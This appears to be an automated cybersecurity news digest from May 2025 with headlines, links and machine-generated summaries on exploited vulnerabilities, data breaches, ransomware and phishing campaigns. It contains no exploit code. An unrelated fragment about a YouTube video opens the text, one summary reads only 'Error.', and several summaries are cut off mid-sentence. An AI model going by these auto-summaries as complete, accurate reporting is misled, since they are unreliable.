Autosummary: The video "I Explored 2000 Year Old Ancient Temples" shows the influencer, real name Jimmy Donaldson, 27, and his team exploring ancient Mayan cities, with a permit. "


Building cybersecurity culture in science-driven organizations

ciber
2025-05-15 https://www.helpnetsecurity.com/2025/05/15/anne-sofie-roed-rasmussen-novonesis-science-driven-organization-cybersecurity/

In this Help Net Security interview, Anne Sofie Roed Rasmussen, CISO at Novonesis, discusses how a science-driven organization approaches cybersecurity, aligning innovation with protection, measuring cultural progress, managing shadow IT, and earning trust from scientific leaders. How do you measure progress when it comes to building a cybersecurity culture in a science-driven organization? Science, exploration, and innovation are at the heart of our organizational DNA. However, no one is immune to making mistakes—anyone, regardless of … More

The post Building cybersecurity culture in science-driven organizations appeared first on Help Net Security.

"

Autosummary: Error. "


Google fixes high severity Chrome flaw with public exploit

exploits
2025-05-15 https://www.bleepingcomputer.com/news/security/google-fixes-high-severity-chrome-flaw-with-public-exploit/
Google has released emergency security updates to patch a high-severity Chrome vulnerability that has a public exploit and can let attackers hijack accounts. [...] "

Autosummary: In March, ​Google also fixed a high-severity Chrome zero-day bug (CVE-2025-2783) that was abused to deploy malware in espionage attacks targeting Russian government organizations, media outlets, and educational institutions. "


New Chrome Vulnerability Enables Cross-Origin Data Leak via Loader Referrer Policy

exploits
2025-05-15 https://thehackernews.com/2025/05/new-chrome-vulnerability-enables-cross.html
Google on Wednesday released updates to address four security issues in its Chrome web browser, including one for which it said there exists an exploit in the wild. The high-severity vulnerability, tracked as CVE-2025-4664 (CVSS score: 4.3), has been characterized as a case of insufficient policy enforcement in a component called Loader. "Insufficient policy enforcement in Loader in Google "

Autosummary: "


U.S. CISA adds a Fortinet flaw to its Known Exploited Vulnerabilities catalog

exploits
2025-05-15 https://securityaffairs.com/177862/hacking/u-s-cisa-adds-a-fortinet-flaw-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Fortinet vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Fortinet Multiple Products Stack-Based Buffer Overflow Vulnerability, tracked as CVE-2025-32756, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Fortinet released security updates to address a critical remote code execution zero-day, […] "

Autosummary: “To verify if fcgi debugging is enabled on your system, use the following CLI command:
diag debug application fcgi
If the output shows “general to-file ENABLED”, it means fcgi debugging is enabled on your system:
fcgi debug level is 0x80041
general to-file ENABLED
This is not a default setting, so unless you have enabled it in the past, this is potentially an Indicator of Compromise” continues the advisory. "


Threat landscape for industrial automation systems. Q1 2025

industry
2025-05-15 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q1-2025/
The percentage of ICS computers on which various types of malware spread via the internet and email were blocked increased for the first time in two years. "

Autosummary: [Table: percentage of ICS computers on which malicious objects of different categories were blocked; columns are previous quarter, Q1 2025, change in percentage points]
(category label not recovered) 7.11% 7.16% ▲0.05 pp
Denylisted internet resources 5.52% 5.12% ▼0.40 pp
Spy Trojans, backdoors and keyloggers 4.30% 4.20% ▼0.10 pp
Malicious documents (MSOffice + PDF) 1.71% 1.85% ▲0.14 pp
Viruses 1.61% 1.53% ▼0.08 pp
Worms 1.37% 1.31% ▼0.06 pp
Miners in the form of executable files for Windows 0.70% 0.78% ▲0.08 pp
Web miners running in browsers 0.39% 0.53% ▲0.14 pp
Malware for AutoCAD 0.38% 0.34% ▼0.04 pp
Ransomware 0.21% 0.16% ▼0.05 pp
Main threat sources
Internet 9.98% 10.11% ▲0.13 pp
Email clients 2.72% 2.81% ▲0.09 pp
Removable media 0.64% 0.52% ▼0.12 pp
Network folders 0.08% 0.07% ▼0.01 pp
Trends: Relative stability from quarter to quarter.
[Figure: Percentage of ICS computers on which threats from network folders were blocked, Q1 2022–Q1 2025]
[Figure: Percentage of ICS computers on which threats from network folders were blocked, Q1 2023–Q1 2025]
The top three regions by percentage of ICS computers on which threats from network folders were blocked were East Asia, South-East Asia, and South Asia.
This group includes Windows computers that serve one or several of the following purposes: supervisory control and data acquisition (SCADA) servers; building automation servers; data storage (Historian) servers; data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used to manage technological and building automation networks; computers of ICS/PLC programmers. Computers that share statistics with us belong to organizations from various industries.
[Figure: Percentage of ICS computers on which the activity of malicious objects from various categories was blocked]
[Figure: Changes in percentage of ICS computers on which malicious objects from different categories were blocked, Q1 2025]
The largest proportional increase in Q1 2025 was in the percentage of ICS computers on which web miners (1.4 times more than in the previous quarter) and malicious documents (1.1 times more) were blocked.
[Figure: Changes in percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2025]
Next-stage malware: Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers.
[Figure: Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Jan 2023–Mar 2025]
The top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Southern Europe, Africa, and the Middle East.
[Figure: Changes in percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Q1 2025]
Web miners: In Q1 2025, the percentage of ICS computers on which web miners were blocked increased, reaching its highest level since Q3 2023.
[Figure: Percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Jan 2023–Mar 2025]
Central Asia, Russia, and Eastern Europe were the top three regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked.
[Figure: Percentage of ICS computers on which threats from removable media were blocked, Q1 2022–Q1 2025]
The main categories of threats that are blocked when removable media is connected to ICS computers are worms, viruses, and spyware.
[Figure: Percentage of ICS computers on which threats from the internet were blocked, Q1 2022–Q1 2025]
The main categories of threats from the internet blocked on ICS computers are denylisted internet resources, malicious scripts and phishing pages, and web miners.
[Figure: Percentage of ICS computers on which threats from email clients were blocked, Q1 2022–Q1 2025]
The main categories of threats from email clients blocked on ICS computers are malicious documents, spyware, malicious scripts and phishing pages.
[Figure: Regions ranked by percentage of ICS computers on which threats from email clients were blocked, Q1 2025]
Removable media: In Q1 2025, the percentage of ICS computers on which threats from removable media were blocked continued to decrease and reached its lowest level since the beginning of 2023.
[Figure: Regions ranked by percentage of ICS computers on which threats from removable media were blocked, Q1 2025]
Network folders: In Q1 2025, the percentage of ICS computers on which threats from network folders were blocked reached its lowest level since early 2022. "


Coinbase data breach exposes customer info and government IDs

financial government
2025-05-15 https://www.bleepingcomputer.com/news/security/coinbase-discloses-breach-faces-up-to-400-million-in-losses/
Coinbase, a cryptocurrency exchange with over 100 million customers, has disclosed that cybercriminals working with rogue support agents stole customer data and demanded a $20 million ransom not to publish the stolen information. [...] "

Autosummary: Masked Social Security (last four digits only); Masked bank-account numbers and some bank account identifiers; Government‑ID images (e.g., driver's license, passport); Account data (balance snapshots and transaction history); and Limited corporate data (including documents, training material, and communications available to support agents). "


Samsung patches MagicINFO 9 Server vulnerability exploited by attackers

exploits
2025-05-15 https://www.helpnetsecurity.com/2025/05/15/samsung-patches-magicinfo-9-server-vulnerability-exploited-by-attackers/

Companies running Samsung MagicINFO, a platform for managing content on Samsung commercial digital displays, should upgrade to the latest available version of its v9 branch to fix a vulnerability that’s reportedly being exploited by attackers. If this advice sounds familiar, it’s because it is a repeat of a call that happened ten days ago, when researchers spotted attackers attempting to compromise machines running the platform’s server component by exploiting a path traversal vulnerability. At the … More

The post Samsung patches MagicINFO 9 Server vulnerability exploited by attackers appeared first on Help Net Security.

"

Autosummary: At the time, the researchers believed that the vulnerability in question was CVE-2024-7399 (ostensibly fixed in August 2024), since a proof-of-concept exploit for such a vulnerability was published on April 30, 2025. "


5 BCDR Essentials for Effective Ransomware Defense

exploits ransomware
2025-05-15 https://thehackernews.com/2025/05/top-5-bcdr-capabilities-for-ransomware-defense.html
Ransomware has evolved into a deceptive, highly coordinated and dangerously sophisticated threat capable of crippling organizations of any size. Cybercriminals now exploit even legitimate IT tools to infiltrate networks and launch ransomware attacks. In a chilling example, Microsoft recently disclosed how threat actors misused its Quick Assist remote assistance tool to deploy the destructive "

Autosummary: Follow the 3-2-1 (and then some!) backup rule The 3-2-1 backup rule has long been the gold standard: keep three copies of your data, store them on two different media and keep one copy off-site. No organization is immune to ransomware, and building a strong recovery strategy is equally, if not even more, important than attempting to prevent all attacks in the first place. Review regularly for: Security-related events like failed logins, privilege escalations, deletion of backups and device removal. According to Microsoft Digital Defense Report 2024, threat actors are trying to access user credentials through various methods, such as phishing, malware and brute-force/password spray attacks. Innovations like Ransomware-as-a-Service (RaaS) are lowering the bar for entry, making ransomware attacks more frequent and far-reaching than ever before. Protect your backup infrastructure from ransomware and internal threats Your backup infrastructure must be isolated, hardened and tightly controlled to prevent unauthorized access or tampering. "


Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers

exploits government
2025-05-15 https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html
A Russia-linked threat actor has been attributed to a cyber espionage operation targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities, including a then-zero-day in MDaemon, according to new findings from ESET. The activity, which commenced in 2023, has been codenamed Operation RoundPress by the Slovak cybersecurity company. It has "

Autosummary: It has been attributed with medium confidence to the Russian state-sponsored hacking group tracked as APT28, which is also referred to as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. A Russia-linked threat actor has been attributed to a cyber espionage operation targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities, including a then-zero-day in MDaemon, according to new findings from ESET. "


Nova Scotia Power confirms hackers stole customer data in cyberattack

ciber
2025-05-15 https://www.bleepingcomputer.com/news/security/nova-scotia-power-confirms-hackers-stole-customer-data-in-cyberattack/
Nova Scotia Power confirms it suffered a data breach after threat actors stole sensitive customer data in a cybersecurity incident discovered last month. [...] "

Autosummary: "


Windows 11 and Red Hat Linux hacked on first day of Pwn2Own

Linux
2025-05-15 https://www.bleepingcomputer.com/news/security/windows-11-and-red-hat-linux-virtualbox-hacked-on-first-day-of-pwn2own/
On the first day of Pwn2Own Berlin 2025, security researchers were awarded $260,000 after successfully demonstrating zero-day exploits for Windows 11, Red Hat Linux, Docker Desktop, and Oracle VirtualBox. [...] "

Autosummary: "


New Tor Oniux tool anonymizes any Linux app's network traffic

Linux
2025-05-15 https://www.bleepingcomputer.com/news/security/new-tor-oniux-tool-anonymizes-any-linux-apps-network-traffic/
Tor has announced Oniux, a new command-line tool for routing any Linux application securely through the Tor network for anonymized network connections. [...] "

Autosummary: [Table: oniux compared with torsocks; columns are oniux | torsocks]
Standalone application | Requires running Tor daemon
Uses Linux namespaces | Uses an ld.so preload hack
Works on all applications | Only works on applications making system calls through libc
Malicious application cannot leak | Malicious application can leak by making a system call through raw assembly
Linux only | Cross-platform
New and experimental | Battle-proven for over 15 years
Uses Arti as its engine | Uses CTor as its engine
Written in Rust | Written in C
Despite the obvious advantages of Oniux, Tor highlights that the project is still experimental and hasn't been tested extensively under multiple conditions and scenarios. "


Coinbase suffers data breach, gets extorted (but won’t pay)

financial
2025-05-15 https://www.helpnetsecurity.com/2025/05/15/coinbase-suffers-data-breach-gets-extorted/

Cryptocurrency exchange platform Coinbase has suffered a breach, which resulted in attackers acquiring customers’ data that can help them mount social engineering attacks, the company confirmed today by filing a report with the US Securities and Exchange Commission (SEC). The attack did not involve the compromise of company systems or networks. Instead, the data was accessed by a group of malicious support agents. How did the attack happen? According to the US-based company, criminals bribed … More

The post Coinbase suffers data breach, gets extorted (but won’t pay) appeared first on Help Net Security.

"

Autosummary: The rogue agents got their hands on customers’ name, address, phone number, email address, the last 4 digits of their Social Security number, masked bank account numbers and some bank account identifiers, images of government-issued IDs, and some account data (transaction history, snapshots of customers’ Coinbase account balance). "


Government webmail hacked via XSS bugs in global spy campaign

exploits government
2025-05-15 https://www.bleepingcomputer.com/news/security/government-webmail-hacked-via-xss-bugs-in-global-spy-campaign/
Hackers are running a worldwide cyberespionage campaign dubbed "RoundPress," leveraging zero-day and n-day flaws in webmail servers to steal email from high-value government organizations. [...] "

Autosummary: [Image: Credential stealer function. Source: ESET] Additionally, it reads the DOM or sends HTTP requests to collect email message content, contacts, webmail settings, login history, two-factor authentication, and passwords. Notable targets include governments in Greece, Ukraine, Serbia, and Cameroon, military units in Ukraine and Ecuador, defense companies in Ukraine, Bulgaria, and Romania, and critical infrastructure in Ukraine and Bulgaria. "


Nova Scotia Power discloses data breach after March security incident

financial
2025-05-15 https://securityaffairs.com/177887/cyber-crime/nova-scotia-power-discloses-data-breach-after-march-security-incident.html
Nova Scotia Power confirmed a data breach involving the theft of sensitive customer data after the April cybersecurity incident. Nova Scotia Power Inc. is a vertically integrated electric utility serving the province of Nova Scotia, Canada. Headquartered in Halifax, it is a subsidiary of Emera Inc. The company provides electricity to over 500,000 residential, commercial, and […] "

Autosummary: “ The impacted personal information varies by customer and could include different types depending on what each customer provided, including name, phone number, email address, mailing and service addresses, Nova Scotia Power program participation information, date of birth, and customer account history (such as power consumption, service requests, customer payment, billing, and credit history, and customer correspondence), driver’s license number, and Social Insurance Number. "


Coinbase disclosed a data breach after an extortion attempt

financial
2025-05-15 https://securityaffairs.com/177878/cyber-crime/coinbase-disclosed-a-data-breach-after-an-extortion-attempt.html
Coinbase confirmed rogue contractors stole customer data and demanded a $20M ransom in a breach reported to the SEC. Coinbase said rogue contractors stole data on under 1% of users and demanded $20M; the data breach was disclosed in an SEC filing. On May 11, 2025, the company received a ransom demand from a threat […] "

Autosummary: Compromised data includes: Name, address, phone, and email; Masked Social Security (last 4 digits only); Masked bank-account numbers and some bank account identifiers; Government‑ID images (e.g., driver’s license, passport); Account data (balance snapshots and transaction history); and Limited corporate data (including documents, training material, and communications available to support agents). "


Southwest Airlines CISO on tackling cyber risks in the aviation industry

industry
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/carrie-mills-southwest-airlines-aviation-industry-cybersecurity-challenges/

In this Help Net Security interview, Carrie Mills, VP and CISO, Southwest Airlines talks about the cybersecurity challenges facing the aviation industry. She explains how being part of critical infrastructure, a major consumer brand, and an airline each brings its own set of security issues. What are the most pressing cyber threats currently facing the aviation industry? Southwest is not only an airline but also a well-known consumer brand and part of a United States … More

The post Southwest Airlines CISO on tackling cyber risks in the aviation industry appeared first on Help Net Security.

"

Autosummary: While not aviation-specific, Southwest leverages the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF), which provides a risk-based approach integral to mitigating cybersecurity risks and impacts on our facilities, airports, and aircraft. How effective are current regulations and cybersecurity standards (e.g., ICAO, EASA, FAA, IATA) in mitigating cyber risks in aviation? "


European Vulnerability Database goes live, but who benefits?

exploits
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/enisa-european-vulnerability-database-euvd/

The European Union Agency for Cybersecurity (ENISA) has unveiled the European Vulnerability Database (EUVD), an initiative under the NIS2 Directive aimed at enhancing digital security across the EU. The database serves as a centralized repository offering aggregated and actionable information on cybersecurity vulnerabilities affecting ICT products and services. European Vulnerability Database: Features and accessibility The EUVD is designed to ensure a high level of interconnection of publicly available information from multiple sources, including Computer Security … More

The post European Vulnerability Database goes live, but who benefits? appeared first on Help Net Security.

"

Autosummary: The database is accessible to the public, including suppliers of network and information systems, entities using their services, competent national authorities, private companies, and researchers. It makes sense not only from a sovereignty perspective for the EU, I also think it’s a smart move to reduce reliance on a single system whose future funding and viability isn’t clear,” Joe Nicastro, Field CTO, Legit Security, told Help Net Security. "


Ransomware spreads faster, not smarter

exploits
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/ransomware-landscape-shift-2025/

The fall of two of the most dominant ransomware syndicates, LockBit and AlphV, triggered a power vacuum across the cybercriminal landscape, according to a Black Kite survey. In their place, dozens of new actors emerged, many of them lacking the infrastructure, discipline, or credibility of their predecessors. The result was a surge in attack volume, a decline in coordination, and growing unpredictability in how, where, and why attacks occur. Ransomware landscape shift The number of … More

The post Ransomware spreads faster, not smarter appeared first on Help Net Security.

"

Autosummary: For the second consecutive year, the top three most targeted industries were manufacturing (1,314 victims), professional, scientific, and technical services (1,040 victims), and healthcare and social assistance (434 victims). In their place, dozens of new actors emerged, many of them lacking the infrastructure, discipline, or credibility of their predecessors. "


Fortinet Patches CVE-2025-32756 Zero-Day RCE Flaw Exploited in FortiVoice Systems

exploits
2025-05-14 https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html
Fortinet has patched a critical security flaw that it said has been exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. The vulnerability, tracked as CVE-2025-32756, carries a CVSS score of 9.6 out of 10.0. "A stack-based overflow vulnerability [CWE-121] in FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera may allow a remote unauthenticated attacker to "

Autosummary: "


Ivanti Patches EPMM Vulnerabilities Exploited for Remote Code Execution in Limited Attacks

exploits
2025-05-14 https://thehackernews.com/2025/05/ivanti-patches-epmm-vulnerabilities.html
Ivanti has released security updates to address two security flaws in Endpoint Manager Mobile (EPMM) software that have been chained in attacks to gain remote code execution. The vulnerabilities in question are listed below - CVE-2025-4427 (CVSS score: 5.3) - An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials "

Autosummary: "


Nobara Linux 42 brings performance boost and better hardware support

Linux
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/nobara-linux-42-released/

The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. Nobara Linux 42 includes changes that will be especially useful for anyone who wants a preconfigured Fedora-based desktop with minimal setup. Nobara is a custom version of Fedora Linux that includes extra drivers, packages, and … More

The post Nobara Linux 42 brings performance boost and better hardware support appeared first on Help Net Security.

"

Autosummary: For people who want a ready-to-use desktop for gaming, media work, or daily tasks, that can mean a lot of extra setup. The Nobara Project has released a new version of its Linux distribution, bringing updated packages, performance improvements, and a few visual tweaks aimed at making life easier for users who want a system that works well out of the box. "


Resilience helps businesses understand their cyber risk in financial terms

financial
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/resilience-cyber-risk-calculator/

Resilience launched Cyber Risk Calculator to provide organizations with a financial snapshot of their cyber risk. The AI-powered tool provides security and risk practitioners and C-Suite executives alike with a data-driven language to better understand and quantify their cyber risk. The Cyber Risk Calculator uses industry benchmarks to help stakeholders understand their risk exposure and potential financial losses due to cyber-related incidents. Existing strategies for understanding cyber risk, such as heat maps, focus on vague ratings … More

The post Resilience helps businesses understand their cyber risk in financial terms appeared first on Help Net Security.

"

Autosummary: Drawing from our unique bird’s-eye-view of the threat landscape, extensive underwriting capabilities, and proprietary Risk Operations Center, we built a tool that bridges this communication gap,” said Dr. Ann Irvine, Chief Data and Analytics Officer at Resilience. "


Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server

exploits
2025-05-14 https://thehackernews.com/2025/05/microsoft-fixes-78-flaws-5-zero-days.html
Microsoft on Tuesday shipped fixes to address a total of 78 security flaws across its software lineup, including a set of five zero-days that have come under active exploitation in the wild. Of the 78 flaws resolved by the tech giant, 11 are rated Critical, 66 are rated Important, and one is rated Low in severity. Twenty-eight of these vulnerabilities lead to remote code execution, 21 of them "

Autosummary: The five vulnerabilities that have come under active exploitation in the wild are listed below -
CVE-2025-30397 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability
CVE-2025-30400 (CVSS score: 7.8) - Microsoft Desktop Window Manager (DWM) Driver Elevation of Privilege Vulnerability
CVE-2025-32706 (CVSS score: 7.8) - Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2025-32709 (CVSS score: 7.8) - Windows "


Fortinet fixed actively exploited FortiVoice zero-day

exploits
2025-05-14 https://securityaffairs.com/177800/security/fortinet-fixed-actively-exploited-fortivoice-zero-day.html
Fortinet fixed a critical remote code execution zero-day vulnerability actively exploited in attacks targeting FortiVoice enterprise phone systems. Fortinet released security updates to address a critical remote code execution zero-day, tracked as CVE-2025-32756, that was exploited in attacks targeting FortiVoice enterprise phone systems. The vulnerability is a stack-based overflow issue that impacts in FortiVoice, FortiMail, FortiNDR, […] "

Autosummary: “To verify if fcgi debugging is enabled on your system, use the following CLI command:
diag debug application fcgi
If the output shows “general to-file ENABLED”, it means fcgi debugging is enabled on your system:
fcgi debug level is 0x80041
general to-file ENABLED
This is not a default setting, so unless you have enabled it in the past, this is potentially an Indicator of Compromise” continues the advisory. "


Fashion giant Dior discloses cyberattack, warns of data breach

financial ciber
2025-05-14 https://www.bleepingcomputer.com/news/security/fashion-giant-dior-discloses-cyberattack-warns-of-data-breach/
House of Dior, the French luxury fashion brand commonly referred to as Dior, has disclosed a cybersecurity incident that has exposed customer information. [...] "

Autosummary: According to screenshots of the notices shared online, the incident was discovered on May 7, involving unauthorized personnel access, and exposed the following information: full name, gender, phone number, email address, postal address, purchase history. (Notice sent to China customers; source: marketing-interactive.com.) The notice posted on Dior’s Korean shop also sets the breach date to May 7, 2025, suggesting a common cybersecurity incident that had an international impact.


McAfee’s Scam Detector identifies scams across text, email, and video

financial
2025-05-14 https://www.helpnetsecurity.com/2025/05/14/mcafees-scam-detector/

McAfee is introducing McAfee’s Scam Detector, a new feature that automatically identifies scams across text, email, and video. Available now in all core McAfee plans at no extra cost, it arrives at a critical moment: nearly 1 in 3 Americans say they have fallen victim to an online scam in the last 12 months. To meet this growing threat, McAfee is protecting customers with advanced, in-plan, AI-powered scam detection – and driving education and awareness … More

The post McAfee’s Scam Detector identifies scams across text, email, and video appeared first on Help Net Security.


Autosummary: On-demand scam check: Upload a message, screenshot, or link for speedy analysis and context. Deepfake detection: Identifies AI-generated videos with 96% accuracy in seconds. Built for modern communication: Works across apps, browsers, and devices, including iMessage, WhatsApp, Messenger, Gmail, and more. Designed with a mobile-first approach, McAfee’s Scam Detector meets people where scams happen most.


Horabot Malware Targets 6 Latin American Nations Using Invoice-Themed Phishing Emails

financial exploits
2025-05-14 https://thehackernews.com/2025/05/horabot-malware-targets-6-latin.html
Cybersecurity researchers have discovered a new phishing campaign that's being used to distribute malware called Horabot targeting Windows users in Latin American countries like Mexico, Guatemala, Colombia, Peru, Chile, and Argentina. The campaign is "using crafted emails that impersonate invoices or financial documents to trick victims into opening malicious attachments and can steal email

Autosummary: "The malware then proceeds to steal browser-related data from a range of targeted web browsers, including Brave, Yandex, Epic Privacy Browser, Comodo Dragon, Cent Browser, Opera, Microsoft Edge, and Google Chrome," Lin said.


Microsoft Patch Tuesday security updates for May 2025 fixed 5 actively exploited zero-days

exploits
2025-05-14 https://securityaffairs.com/177839/hacking/microsoft-patch-tuesday-security-updates-for-may-2025-fixed-5-actively-exploited-zero-days.html
Microsoft Patch Tuesday security updates for May 2025 addressed 75 security flaws across multiple products, including five zero-day flaws. Microsoft Patch Tuesday security updates addressed 75 security vulnerabilities in Windows and Windows Components, Office and Office Components, .NET and Visual Studio, Azure, Nuance PowerScribe, Remote Desktop Gateway Service, and Microsoft Defender. Of the flaws fixed by the […]

Autosummary: Driver Elevation of Privilege Vulnerability CVE-2025-32706 (CVSS score: 7.8) – Windows Common Log File System Driver Elevation of Privilege Vulnerability CVE-2025-32709 (CVSS score: 7.8) –


Peru's prime minister resigns ahead of no-confidence vote

latam
2025-05-14 https://www.bbc.com/news/articles/c70nedjg1y1o
Gustavo Adrianzén's resignation is another blow to President Dina Boluarte amid anger over rising crime.



Ransomware gangs join ongoing SAP NetWeaver attacks

exploits
2025-05-14 https://www.bleepingcomputer.com/news/security/ransomware-gangs-join-ongoing-sap-netweaver-attacks/
Ransomware gangs have joined ongoing SAP NetWeaver attacks, exploiting a maximum-severity vulnerability that allows threat actors to gain remote code execution on vulnerable servers. [...]

Autosummary: "Persistence backdoor access to these systems provides a foothold for China-aligned APTs, potentially enabling strategic objectives of the People’s Republic of China (PRC), including military, intelligence, or economic advantage," Forescout said.


Microsoft fixes Linux boot issues on dual-boot Windows systems

Linux
2025-05-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-linux-boot-issues-on-dual-boot-windows-systems/
Microsoft has fixed a known issue preventing Linux from booting on dual-boot systems with Secure Boot enabled after installing the August 2024 Windows security updates. [...]



Steel giant Nucor Corporation facing disruptions after cyberattack

ciber
2025-05-14 https://www.bleepingcomputer.com/news/security/steel-giant-nucor-corporation-facing-disruptions-after-cyberattack/
A cybersecurity incident on Nucor Corporation's systems forced the company to take offline parts of its networks and implement containment measures. [...]



Focused Phishing: Attack Targets Victims With Trusted Sites and Live Validation

financial
2025-05-14 https://www.bleepingcomputer.com/news/security/focused-phishing-attack-targets-victims-with-trusted-sites-and-live-validation/
New phishing tactics are abusing trusted domains, real CAPTCHAs, and server-side email validation to selectively target victims with customized fake login pages. Keep Aware's latest research breaks down the full attack chain and how these zero-day phish operate. [...]

Autosummary: To defend against this type of advanced, targeted phishing: ensure your security stack can detect and block phishing pages even on trusted domains; invest in tools that recognize the impersonation of legitimate business platforms your organization uses (e.g., Microsoft 365, Okta, Google Workspace); ensure your employees have real-time, browser-level protection, not just email filtering. Keeping up with ever-evolving attacks: phishing continues to evolve—leveraging legitimate infrastructure, precision email validation, and evasive delivery techniques. Precision-validated phishing, server-side: this technique, in which an attacker validates an email address in real time to ensure only the intended targets or targets of higher value receive the final phishing page, is referred to as “Precision-Validated Phishing”. This pre-population technique implies the phishing emails include target-specific links, such as: compromised.domain.com/file/path?#victim_email@example.com. Similar techniques have been seen before, like in a recent write-up, where a malicious SVG attached in a phishing email used JavaScript to append the victim’s email to a malicious URL and redirect the browser. This attack illustrates the abuse of trusted domains, the practice of server-side phishing email validation, and the critical need for browser-based, zero-day phishing protection.


Xinbi Telegram Market Tied to $8.4B in Crypto Crime, Romance Scams, North Korea Laundering

financial
2025-05-14 https://thehackernews.com/2025/05/xinbi-telegram-market-tied-to-84b-in.html
A Chinese-language, Telegram-based marketplace called Xinbi Guarantee has facilitated no less than $8.4 billion in transactions since 2022, making it the second major black market to be exposed after HuiOne Guarantee. According to a report published by blockchain analytics firm Elliptic, merchants on the marketplace have been found to peddle technology, personal data, and money laundering

Autosummary: Xinbi Guarantee, per Elliptic, has 233,000 users, with merchants broken down into broad categories related to money laundering, Starlink satellite internet equipment, fake IDs, and databases of stolen personal information used to target potential victims.


CTM360 Identifies Surge in Phishing Attacks Targeting Meta Business Users

financial
2025-05-14 https://thehackernews.com/2025/05/ctm360-identifies-surge-in-phishing.html
A new global phishing threat called "Meta Mirage" has been uncovered, targeting businesses using Meta's Business Suite. This campaign specifically aims at hijacking high-value accounts, including those managing advertising and official brand pages. Cybersecurity researchers at CTM360 revealed that attackers behind Meta Mirage impersonate official Meta communications, tricking users into handing

Autosummary: Cybercriminals cleverly hosted fake pages leveraging trusted cloud platforms like GitHub, Firebase, and Vercel, making it harder to spot the scams.


Samsung Patches CVE-2025-4632 Used to Deploy Mirai Botnet via MagicINFO 9 Exploit

exploits
2025-05-14 https://thehackernews.com/2025/05/samsung-patches-cve-2025-4632-used-to.html
Samsung has released software updates to address a critical security flaw in MagicINFO 9 Server that has been actively exploited in the wild. The vulnerability, tracked as CVE-2025-4632 (CVSS score: 9.8), has been described as a path traversal flaw. "Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server version before 21.1052 allows attackers to



BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan

exploits
2025-05-14 https://thehackernews.com/2025/05/bianlian-and-ransomexx-exploit-sap.html
At least two different cybercrime groups, BianLian and RansomExx, are said to have exploited a recently disclosed security flaw in SAP NetWeaver, indicating that multiple threat actors are taking advantage of the bug. Cybersecurity firm ReliaQuest, in a new update published today, said it uncovered evidence suggesting involvement from the BianLian data extortion crew and the RansomExx ransomware

Autosummary: ReliaQuest said it also observed the deployment of a plugin-based trojan dubbed PipeMagic, which was most recently used in connection with the zero-day exploitation of a privilege escalation bug (CVE-2025-29824) in the Windows Common Log File System (CLFS) in limited attacks targeting entities in the U.S., Venezuela, Spain, and Saudi Arabia.


U.S. CISA adds Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog

exploits
2025-05-14 https://securityaffairs.com/177856/security/u-s-cisa-adds-microsoft-windows-flaws-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Microsoft Windows flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: Microsoft addressed these flaws with the release of the Patch Tuesday Security updates […]

Autosummary: Driver Elevation of Privilege Vulnerability CVE-2025-32706 (CVSS score: 7.8) – Windows Common Log File System Driver Elevation of Privilege Vulnerability CVE-2025-32709 (CVSS score: 7.8) – Scripting Engine Memory Corruption Vulnerability CVE-2025-30400 (CVSS score: 7.8) – Microsoft Desktop Window Manager (DWM) Core Library Elevation of Privilege Vulnerability


Ivanti fixed two EPMM flaws exploited in limited attacks

exploits
2025-05-14 https://securityaffairs.com/177846/uncategorized/ivanti-fixed-two-epmm-flaws-exploited-in-limited-attacks.html
Ivanti addressed two Endpoint Manager Mobile (EPMM) software vulnerabilities that have been exploited in limited attacks. Ivanti has released security updates to address two vulnerabilities in Endpoint Manager Mobile (EPMM) software. The company confirmed that threat actors have chained the flaws in limited attacks to gain remote code execution. The two vulnerabilities are tracked as CVE-2025-4427 and […]

